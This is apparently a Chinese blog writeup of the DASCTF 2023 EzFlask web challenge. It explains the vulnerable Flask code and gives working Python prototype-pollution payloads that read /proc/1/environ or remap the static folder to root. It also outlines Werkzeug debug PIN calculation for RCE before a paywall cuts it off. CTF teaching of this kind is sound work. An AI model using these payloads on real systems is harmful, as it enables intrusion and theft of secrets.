[DASCTF 2023 & 0X401七月暑期挑战赛] Web方向部分题 详细Writeup

最新推荐文章于 2024-08-05 21:48:07 发布
原创 最新推荐文章于 2024-08-05 21:48:07 发布 · 765 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #web安全

博客对EzFlask、ez_cms、MyPicDisk、ez_py、ez_timing等项目代码进行分析。涉及Flask应用开发、Django项目设置,还探讨了原型链污染、本地文件包含、命令拼接注入等漏洞利用方法,如计算PIN码进行RCE、构造phar包上传等。

EzFlask

import uuid

from flask import Flask, request, session
from secret import black_list
import json

app = Flask(__name__)
app.secret_key = str(uuid.uuid4())

def check(data):
    for i in black_list:
        if i in data:
            return False
    return True

def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

class user():
    def __init__(self):
        self.username = ""
        self.password = ""
        pass
    def check(self, data):
        if self.username == data['username'] and self.password == data['password']:
            return True
        return False

Users = []

@app.route('/register',methods=['POST'])
def register():
    if request.data:
        try:
            if not check(request.data):
                return "Register Failed"
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Register Failed"
            User = user()
            merge(data, User)
            Users.append(User)
        except Exception:
            return "Register Failed"
        return "Register Success"
    else:
        return "Register Failed"

@app.route('/login',methods=['POST'])
def login():
    if request.data:
        try:
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Login Failed"
            for user in Users:
                if user.check(data):
                    session["username"] = data["username"]
                    return "Login Success"
        except Exception:
            return "Login Failed"
    return "Login Failed"

@app.route('/',methods=['GET'])
def index():
    return open(__file__, "r").read()

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5010)

代码解释:

  1. 导入所需模块:
  • uuid:用于生成Flask应用程序的随机密钥。
  • Flaskrequestsession来自flask包:这些模块用于创建Web应用程序、处理HTTP请求和管理用户会话。
  • secret中的black_list:假设black_list包含敏感词汇列表。
  1. 设置Flask应用程序和密钥:
  • 创建一个Flask应用程序对象,并为其设置一个随机生成的密钥,这个密钥用于保护会话数据的安全性。
  1. 定义一些辅助函数:
  • check(data): 用于检查传入的数据是否包含在black_list敏感词汇列表中。
  • merge(src, dst): 用于合并两个字典对象,将src字典中的内容合并到dst字典中。
  1. 定义一个user类:
  • 该类包含了usernamepassword属性,并有一个check方法,用于检查用户输入的数据是否与当前实例的用户名和密码匹配。
  1. 创建一个空的Users列表,用于存储注册的用户信息。
  2. 定义了三个路由(route):
  • /register:处理用户注册的POST请求。
  • /login:处理用户登录的POST请求。
  • /:处理GET请求,用于显示当前代码文件的内容。
  1. /register路由的处理函数:
  • 从POST请求中获取数据,并检查是否包含在敏感词汇列表中。若存在敏感词汇,则注册失败。
  • 将接收到的数据转换为JSON格式,并确保数据中包含usernamepassword字段,否则注册失败。
  • 创建一个新的user对象,并将请求中的数据合并到该对象中。
  • 将该用户对象添加到Users列表中,完成注册。
  1. /login路由的处理函数:
  • 从POST请求中获取数据,并确保数据中包含usernamepassword字段。
  • 遍历Users列表中的用户对象,使用user.check(data)方法检查用户输入的数据是否与任何已注册用户的用户名和密码匹配。
  • 若匹配成功,则将username存储到会话(session)中,并返回"Login Success",表示登录成功。
  1. /路由的处理函数:
  • 处理GET请求,将当前代码文件的内容返回给请求者。

这道题现学Python原型链污染

具体可看Article_kelp师傅:Python原型链污染变体(prototype-pollution-in-python)

有两种非预期解

第一种,通过file属性直接读取环境变量

__file__是从中加载模块的文件的路径名(如果它是从文件加载的)。__file__对于静态链接到解释器的C模块,该属性不存在。对于从共享库动态加载的扩展模块,它是共享库文件的路径名。

在您的情况下,模块正在__file__全局名称空间中访问其自己的属性。

因为__init__被ban了,所以可以利用全局变量直接使file为存储环境变量的文件

payload:

{
   
   
	"username":"aaa",
	"password":"bbb",
	"__class__":{
   
   
        "check":{
   
   
            "__globals__":{
   
   
                "__file__" : "/proc/1/environ"
            }
        }
	}
}

image-20230726152939436

通过/路由可以看出,该路由直接通过__file__属性来读取文件并进行输出,所以直接访问就可以了

image-20230726153327774

第二种,static静态目录污染

_static_url_path

这个属性中存放的是flask中静态目录的值,默认该值为static。访问flask下的资源可以采用如http://domain/static/xxx,这样实际上就相当于访问_static_url_path目录下xxx的文件并将该文件内容作为响应内容返回

所以我们可以直接构造payload来进行污染,题目过滤掉了__init__,但是check之后经历了一次json.loads,而且json识别unicode,所以我们可以通过Unicode编码进行绕过,payload:

{
   
   
    "__init\u005f_":{
   
   
        "__globals__":{
   
   
            "app":{
   
   
                "_static_folder":"/"
            }
        }
    },
	"username":1,
	"password":1
}

该payload出自Boogipop师傅:DASCTF 2023 & 0X401 Web WriteUp

构造之后_static_folder的值就变成根目录了

image-20230726144104289

然后可以读取环境变量来得到flag

image-20230726144536589

预期解:

题目是开启了flask的debug模式,访问console控制台,然后配合任意文件读取来计算PIN码,最后进行RCE

利用脚本来计算PIN码

PIN码生成六要素

  • username:可以在任意文件读取下读取/etc/password进行猜测
  • modname:默认是flask.app
  • appname:默认是Flask
  • moddir flask库下app.py绝对路径,可以通过报错拿到,如传参的时候给个不存在的变量
  • uuidnode mac地址的十进制:任意文件读取/sys/class/net/the0/address
  • machine_id:机器码

关于machine_id

如果能任意文件读尝试去读取/usr/local/lib/python3.7/site-packages/werkzeug/debug/__init__.py

最低0.47元/天 解锁文章
DASCTF Oct X web
Sk1y的博客
11-16 318
文章目录Web 欢迎来到魔法世界我的解法师傅的wpMisc WELCOME DASCTFxJlenu Web 欢迎来到魔法世界 打开容器,即进行php代码审计 <?php highlight_file('index.php'); extract($_GET);//将GET方式传递的参数赋值 error_reporting(0); function String2Array($data)//eval那里存在命令执行 { if($data == '') return array(); @
DASCTF 四月赛 web部分
weixin_43610673的博客
04-25 2387
Ezunserialize 反序列化POP链、字符逃逸 POP链构造起来不难,字符逃逸参考:https://xz.aliyun.com/t/6588 https://blog.youkuaiyun.com/assasin0308/article/details/103711024 打开送源码 POP链构造: __toString() //把类当作字符串使用时触发,返回值需要为字符串 B类的__destru...
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细解wp
Jay17的博客
08-05 2447
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细解wp
Mar Dasctf web
Biodog的博客
04-09 275
参考大佬http://www.plasf.cn/articles/dasctf202103.html ez_serialize <?php error_reporting(0); highlight_file(__FILE__); class A{ public $class; public $para; public $check; public function __construct() { $this->class = "B"
DASCTF 2022九月赛WEB
weixin_43952190的博客
09-22 924
CTF
DASCTF 2023 & 0X401七月暑期挑战赛 web EzFlask
m0_63138919的博客
08-30 542
1
DASCTF 2023 & 0X401七月暑期挑战赛web复现
weixin_63231007的博客
08-02 1473
python原型链污染&xpath注入&pearcmd文件包含&django框架
DASCTF 2024暑期挑战赛 Reverse writeup
OrientalGlass的博客
07-21 1568
没看。
[第七届蓝帽杯全国大学生网络安全技能大赛 蓝帽杯 2023]——Web方向部分 详细Writeup
Leaf_initial的博客
08-27 4706
Web LovePHP 你真的熟悉PHP吗? 源码如下 <?php class Saferman{ public $check = True; public function __destruct(){ if($this->check === True){ file($_GET['secret']); } } public function __wakeup(){ $this->c
安恒七月DASCTF_web复现
风过江南乱的博客
08-04 1329
前言 比赛时没时间参加,今天因为WMCTF不会做。。。又恰好开放复现环境,所以来看看 神仙打架,菜鸡告辞。 目 1、Ezfileinclude 好像不难。但复现的时候始终没找到flag文件在哪。。。 打开一张动漫,F12,看到提示。 多次刷新发现参数t是动态的,结合格式确定为当前时间戳,然后是参数f,看到 == base64解码得到gqy.jpg 。 所以明了请求方式,只需要获取当时间戳和访问文件的base64的编码即可。 这些问都可以用python解决,现在重点是读什么,怎么读? 首先想到读
[DASCTF 2023 & 0X401七月暑期挑战赛] web记录
rev1ve的博客
11-28 1327
综上所述,app 和 _static_folder 这两个全局变量在 Flask 应用中都扮演着重要的角色,app 是整个应用的核心实例,用于处理请求和设置应用的配置,而 _static_folder 是用于指定静态文件的存放路径,使网页能够正确地加载和显示样式和图像。在Python中,所有以双下划线__包起来的方法,统称为Magic Method(魔术方法),它是一种的特殊方法,普通方法需要调用,而魔术方法不需要调用就可以自动执行。路由下,接收json数据,判断username的session是否正确;
DASCTF 2022十月挑战赛 web
qq_61768489的博客
11-04 951
拿到源码就看哪里可以命令执行RCE,看那些php特殊函数,这里的话 就是`call_user_func($this->cmd, $this->content);首先destruct就直接调用了这两个方法,newnewnew()里面的参数我们是可控的属性,flag()里调用了不存在的方法。这里为何还需要User对象用一个不存在的属性实例化 Test()类,确实不太理解,有和没有的区别如下。admin被注册了,考虑如何登录admin,用普通用户登录一下,有发布文章,修改密码,查看文章的功能。
2020DASCTF五月线上赛-WEB-小红花
Bcdlbgm的博客
05-24 1335
小红花 很明显是命令执行,但肯定有过滤. 首先看函数shell_exec他会执行系统命令,并把执行结果返回出来。但看提示似乎没有把返回结果打印测试后也证实了这个想法。 那么就首先尝试外带了。 dnslog外带-失败 尝试过以后payload都没有成功。听别人说之前有人成功过是因为非预期后来再进行尝试就没有成功了。 echo Y3VybCBibC50ZXN0LmRuc2xvZy5saW5rIA==|base64 -d |sh echo MN2XE3BAMJWC45DFON2C4ZDOONWG6ZZONRUW
DASCTF 2023 & 0X401七月暑期挑战赛 Reverse部分
OrientalGlass的博客
07-23 946
这里的input定义为QWORD[24] 实际上前4个单元(4*8=32字节)没有被使用,后20个QWORD在循环时强转成DWORD(即40个单元),所以input是个4行10列矩阵,并且每行10个DWORD(实际有效内容仅1Byte)第一个循环是进行矩阵乘法并修改data,第二个大循环是检查data是否为零矩阵,也就是说经过第一个大循环运算后data应该全0。主函数发现不了什么,于是在函数列表逐个探查函数,最终找到一个可疑函数有赋值和矩阵乘法。注意这里是从data[10+i]开始。动态调试观察执行情况。
2020 DASCTF四月春季战-Web
weixin_43952190的博客
05-09 983
0x01 Esunserialize 构造反序列化Pop链 字符逃逸 上源码: <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data) { return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data); }
DASCTF-三月赛-web复现
weixin_45800126的博客
04-15 1149
title: DASCTF 三月赛 web复现 date: 2021-04-07 15:04:52 tags: DASCTF BestDB 0x01 源码给了查询语句 $sql = "SELECT * FROM users WHERE id = '$query' OR username = \"$query\""; 过滤单引号,但没过滤双引号,所以选择闭合后面的用户名进行union查询 查表名 query=-1"/**/union/**/select/**/group_concat(table_na.
DASCTF 2024 七月web Sanic‘s revenge&&ciscn 2024 sanic的复盘
最新发布
weixin_73307794的博客
08-05 1050
第一次看到sanic其实是不知所措的,感觉这个虽然是眼熟,但也仅限于眼熟,显而易见的,国赛没有做出来,也因为一些心态问没有做复盘,时隔近两月,慢慢调整好心态后终于是借着gxn师傅的Sanic revenge进行了整体的复盘这里放上gxn师傅的博客。
WebDASCTF2022.07赋能赛
uuzeray的博客
04-14 951
这类常用的字符和关键字,可以用 attr() 配合 unicode 编码绕过。JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。的形式来bypass。Show类文件操作可以触发phar反序列化。使用gzip压缩来绕过对文件内容的检测。监听,拿到flag(补全{}即可)进来有两个功能,一个查看,一个上传。过滤print 关键字,则只能用。访问/SUPPERAPI.php。前端过滤不用管,禁用js即可。图片查看功能可以任意文件读。读文件触发phar反序列化。过滤{{}},我们可以用。
DASCTF-两道web复现
臭nana的博客
05-02 3198
记录一下官方解 Ezunserialize 打开目看到源码 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data) { retu...
HFCTF2022线上赛官方WriteupWEB、CRYPTO与PWN挑战解析
"HFCTF2022线上赛官方Writeup1主要涵盖了多个网络安全和编程挑战,包括WEB、CRYPTO、PWN、REVERSE和MISC等类别。其中,目涉及了RSA加密、MD5哈希、zlib压缩、SSRF漏洞利用、元数据解析、动态链接器预加载(ld_...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leafzzz__

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值